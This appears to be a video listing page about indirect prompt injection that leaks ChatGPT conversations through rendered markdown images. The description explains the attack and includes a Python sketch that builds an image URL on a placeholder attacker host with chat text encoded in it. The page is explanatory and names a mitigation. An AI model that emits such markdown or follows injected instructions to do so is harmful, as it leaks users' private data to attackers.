Data Exfiltration Risks Through ChatGPT Conversations
Learn how indirect prompt injection can secretly extract your chat data via images in ChatGPT. Stay informed and protect your information.

Danny Gershman
671 views • Sep 23, 2025

About this video
Did you know your ChatGPT chats could be at risk? 🚨 Indirect prompt injection can secretly exfiltrate your conversations through images! Stay aware & protect your data. 🔒 Watch out for malicious prompts hiding in plain sight. #CyberSecurity #AIrisks #StaySafe
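The mechanism behind this class of attack is worth spelling out: a malicious document, web page, or image caption hidden in the model's context instructs the assistant to render a markdown image whose URL carries pieces of the conversation, so merely displaying the reply causes the client to request that URL and hand the data to an attacker-controlled server. Below is a minimal sketch of that markdown-image exfiltration pattern; the attacker.example host, pixel.png path, and d query parameter are hypothetical placeholders for illustration, not details taken from the video.

from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"  # hypothetical collection server

def build_exfil_markdown(chat_snippet: str) -> str:
    """Return the markdown an injected prompt might coax the model into emitting.

    If the chat client renders the image, it requests the URL and the encoded
    conversation data ends up in the attacker's access logs.
    """
    encoded = quote(chat_snippet)
    return f"![status]({ATTACKER_HOST}/pixel.png?d={encoded})"

if __name__ == "__main__":
    # Example: an injected instruction told the model to append a "status image"
    # whose URL embeds a summary of the user's last message.
    print(build_exfil_markdown("user shared internal roadmap for Q4 launch"))

Running the script prints markdown that, if rendered by a chat client, would issue a GET request containing the encoded text; this is why restricting which domains model-generated images may load from is a common mitigation.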
Apple: https://podcasts.apple.com/us/podcast/episode-8-llm-caching/id1825463283?i=1000728096532
Spotify: https://open.spotify.com/episode/33GFMhx0j5yjzzEf3NWgoJ?si=iqzVya23R8Gvg6LQ8qUbtw
YouTube: https://youtu.be/p-v89TrUnhM #shorts
Video Information
Views: 671
Likes: 3
Duration: 0:35
Published: Sep 23, 2025